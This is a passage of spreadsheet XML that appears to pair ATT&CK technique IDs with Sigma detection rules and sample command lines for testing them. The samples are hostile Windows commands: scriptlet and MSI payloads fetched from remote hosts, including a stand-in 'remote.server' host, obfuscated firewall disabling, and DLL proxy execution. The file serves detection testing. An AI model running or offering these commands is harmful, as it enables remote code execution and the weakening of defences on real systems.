      <c r="I2216" s="43" t="n"/>
      <c r="J2216" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2216" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2217" ht="15.75" customHeight="1" s="42">
      <c r="A2217" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B2217" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C2217" s="43" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D2217" s="43" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E2217" s="43" t="inlineStr">
        <is>
          <t>cscript.exe //b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct"</t>
        </is>
      </c>
      <c r="F2217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2217" s="43" t="n"/>
      <c r="J2217" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2217" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2218" ht="15.75" customHeight="1" s="42">
      <c r="A2218" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B2218" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C2218" s="43" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D2218" s="43" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E2218" s="43" t="inlineStr">
        <is>
          <t>cscript pubprn.vbs 127.0.0.1 "script:https://remote.server/payload.sct"</t>
        </is>
      </c>
      <c r="F2218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2218" s="43" t="n"/>
      <c r="J2218" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2218" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2219" ht="15.75" customHeight="1" s="42">
      <c r="A2219" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2219" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C2219" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D2219" s="43" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E2219" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Import-Module 'CL_Invocation.ps1'; $method = 'Sync' + 'Invoke'; &amp; $method 'calc.exe' ' '"</t>
        </is>
      </c>
      <c r="F2219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2219" s="43" t="n"/>
      <c r="J2219" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2219" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2220" ht="15.75" customHeight="1" s="42">
      <c r="A2220" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2220" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C2220" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D2220" s="43" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E2220" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Import-Module 'CL_Invocation.ps1'; $method = 'Sync' + 'Invoke'; &amp; $method calc.exe ' '"</t>
        </is>
      </c>
      <c r="F2220" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2220" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2220" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2220" s="43" t="n"/>
      <c r="J2220" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2220" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2221" ht="15.75" customHeight="1" s="42">
      <c r="A2221" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2221" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C2221" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D2221" s="43" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E2221" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Import-Module 'CL_Invocation.ps1'; $method = 'SyncInvoke'; &amp; $method 'calc.exe' ' '"</t>
        </is>
      </c>
      <c r="F2221" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2221" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2221" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2221" s="43" t="n"/>
      <c r="J2221" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2221" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2222" ht="15.75" customHeight="1" s="42">
      <c r="A2222" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2222" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_awl_bypass</t>
        </is>
      </c>
      <c r="C2222" s="43" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl</t>
        </is>
      </c>
      <c r="D2222" s="43" t="inlineStr">
        <is>
          <t>074e0ded-6ced-4ebd-8b4d-53f55908119d</t>
        </is>
      </c>
      <c r="E2222" s="43" t="inlineStr">
        <is>
          <t>copy cscript.exe moved_cscript.exe &amp;&amp; moved_cscript.exe //nologo winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"pretty"</t>
        </is>
      </c>
      <c r="F2222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2222" s="43" t="n"/>
      <c r="J2222" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2222" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2223" ht="15.75" customHeight="1" s="42">
      <c r="A2223" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2223" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C2223" s="43" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D2223" s="43" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E2223" s="43" t="inlineStr">
        <is>
          <t>copy msiexec.exe not_msiexec.exe &amp;&amp; .\not_msiexec.exe -z payload.dll</t>
        </is>
      </c>
      <c r="F2223" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2223" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2223" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2223" s="43" t="n"/>
      <c r="J2223" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2223" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2224" ht="15.75" customHeight="1" s="42">
      <c r="A2224" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2224" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C2224" s="43" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D2224" s="43" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E2224" s="43" t="inlineStr">
        <is>
          <t>msiexec.exe /z "C:\path\to\payload.tmp"</t>
        </is>
      </c>
      <c r="F2224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2224" s="43" t="n"/>
      <c r="J2224" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2224" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2225" ht="15.75" customHeight="1" s="42">
      <c r="A2225" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2225" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C2225" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D2225" s="43" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E2225" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /quiet /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi"</t>
        </is>
      </c>
      <c r="F2225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2225" s="43" t="n"/>
      <c r="J2225" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2225" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2226" ht="15.75" customHeight="1" s="42">
      <c r="A2226" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2226" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C2226" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D2226" s="43" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E2226" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe -q -i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi"</t>
        </is>
      </c>
      <c r="F2226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2226" s="43" t="n"/>
      <c r="J2226" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2226" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2227" ht="15.75" customHeight="1" s="42">
      <c r="A2227" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2227" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C2227" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D2227" s="43" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E2227" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /q /i"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi"</t>
        </is>
      </c>
      <c r="F2227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2227" s="43" t="n"/>
      <c r="J2227" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2227" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2228" ht="15.75" customHeight="1" s="42">
      <c r="A2228" s="43" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B2228" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C2228" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D2228" s="43" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E2228" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\system32\net1  share "\\test\\share" /delete</t>
        </is>
      </c>
      <c r="F2228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2228" s="43" t="n"/>
      <c r="J2228" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2228" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2229" ht="15.75" customHeight="1" s="42">
      <c r="A2229" s="43" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B2229" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C2229" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D2229" s="43" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E2229" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\system32\net1  share \\test\\share /delete</t>
        </is>
      </c>
      <c r="F2229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2229" s="43" t="n"/>
      <c r="J2229" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2229" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2230" ht="15.75" customHeight="1" s="42">
      <c r="A2230" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2230" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2230" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2230" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2230" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\SysWOW64\netsh" firewall add allowedprogram "C:\Program Files\uvnc bvba\UltraVNC\vncviewer.exe" "vncviewer.exe" ENABLE ALL</t>
        </is>
      </c>
      <c r="F2230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2230" s="43" t="n"/>
      <c r="J2230" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2230" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2231" ht="15.75" customHeight="1" s="42">
      <c r="A2231" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2231" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2231" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2231" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2231" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\SysWOW64\\netsh" firewall add allowedprogram "C:\\Program Files\\uvnc bvba\\UltraVNC\\winvnc.exe" "winvnc.exe" ENABLE ALL</t>
        </is>
      </c>
      <c r="F2231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2231" s="43" t="n"/>
      <c r="J2231" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2231" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2232" ht="15.75" customHeight="1" s="42">
      <c r="A2232" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2232" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C2232" s="43" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2232" s="43" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E2232" s="43" t="inlineStr">
        <is>
          <t>netsh.exe advfirewall firewall del rule name="All"</t>
        </is>
      </c>
      <c r="F2232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2232" s="43" t="n"/>
      <c r="J2232" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2232" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2233" ht="15.75" customHeight="1" s="42">
      <c r="A2233" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2233" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C2233" s="43" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2233" s="43" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E2233" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall set allprofiles state o f f</t>
        </is>
      </c>
      <c r="F2233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2233" s="43" t="n"/>
      <c r="J2233" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2233" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2234" ht="15.75" customHeight="1" s="42">
      <c r="A2234" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2234" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C2234" s="43" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2234" s="43" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E2234" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall set allprofiles state o``f``f</t>
        </is>
      </c>
      <c r="F2234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2234" s="43" t="n"/>
      <c r="J2234" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2234" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2235" ht="15.75" customHeight="1" s="42">
      <c r="A2235" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B2235" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_acl</t>
        </is>
      </c>
      <c r="C2235" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Change Permission Via Set-Acl</t>
        </is>
      </c>
      <c r="D2235" s="43" t="inlineStr">
        <is>
          <t>bdeb2cff-af74-4094-8426-724dc937f20a</t>
        </is>
      </c>
      <c r="E2235" s="43" t="inlineStr">
        <is>
          <t>powershell.exe &amp; { $termsrvDll = 'C:\\Windows\\System32\\termsrv.dll'; $ACL = Get-Acl $termsrvDll; $permission = 'Administrators','FullControl','Allow'; $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission; $ACL.SetAccessRule($accessRule); Set-Acl -Path $termsrvDll -AclObject $ACL }</t>
        </is>
      </c>
      <c r="F2235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2235" s="43" t="n"/>
      <c r="J2235" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2235" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2236" ht="15.75" customHeight="1" s="42">
      <c r="A2236" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2236" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2236" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2236" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2236" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -f"T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F2236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2236" s="43" t="n"/>
      <c r="J2236" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2236" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2237" ht="15.75" customHeight="1" s="42">
      <c r="A2237" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B2237" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2237" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2237" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2237" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden -c "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('http://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F2237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2237" s="43" t="n"/>
      <c r="J2237" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2237" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2238" ht="15.75" customHeight="1" s="42">
      <c r="A2238" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B2238" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_obfuscated_ordinal_call</t>
        </is>
      </c>
      <c r="C2238" s="43" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32</t>
        </is>
      </c>
      <c r="D2238" s="43" t="inlineStr">
        <is>
          <t>43fa5350-db63-4b8f-9a01-789a427074e1</t>
        </is>
      </c>
      <c r="E2238" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll, #131096</t>
        </is>
      </c>
      <c r="F2238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2238" s="43" t="n"/>
      <c r="J2238" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2238" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2239" ht="15.75" customHeight="1" s="42">
      <c r="A2239" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B2239" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_obfuscated_ordinal_call</t>
        </is>
      </c>
      <c r="C2239" s="43" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32</t>
        </is>
      </c>
      <c r="D2239" s="43" t="inlineStr">
        <is>
          <t>43fa5350-db63-4b8f-9a01-789a427074e1</t>
        </is>
      </c>
      <c r="E2239" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll,#131096+0</t>
        </is>
      </c>
      <c r="F2239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2239" s="43" t="n"/>
      <c r="J2239" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2239" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2240" ht="15.75" customHeight="1" s="42">
      <c r="A2240" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B2240" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_obfuscated_ordinal_call</t>
        </is>
      </c>
      <c r="C2240" s="43" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32</t>
        </is>
      </c>
      <c r="D2240" s="43" t="inlineStr">
        <is>
          <t>43fa5350-db63-4b8f-9a01-789a427074e1</t>
        </is>
      </c>
      <c r="E2240" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll,#131096</t>
        </is>
      </c>
      <c r="F2240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2240" s="43" t="n"/>
      <c r="J2240" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2240" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2241" ht="15.75" customHeight="1" s="42">
      <c r="A2241" s="43" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B2241" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C2241" s="43" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D2241" s="43" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E2241" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Set-NetFirewallProfile -Profile Private -Enabled:0</t>
        </is>
      </c>
      <c r="F2241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2241" s="43" t="n"/>
      <c r="J2241" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2241" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2242" ht="15.75" customHeight="1" s="42">
      <c r="A2242" s="43" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B2242" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C2242" s="43" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D2242" s="43" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E2242" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Set-NetFirewallProfile -Profile Public -Enabled $false</t>
        </is>
      </c>
      <c r="F2242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2242" s="43" t="n"/>
      <c r="J2242" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2242" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2243" ht="15.75" customHeight="1" s="42">
      <c r="A2243" s="43" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B2243" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_write_protect_for_storage_disabled</t>
        </is>
      </c>
      <c r="C2243" s="43" t="inlineStr">
        <is>
          <t>Write Protect For Storage Disabled</t>
        </is>
      </c>
      <c r="D2243" s="43" t="inlineStr">
        <is>
          <t>75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13</t>
        </is>
      </c>
      <c r="E2243" s="43" t="inlineStr">
        <is>
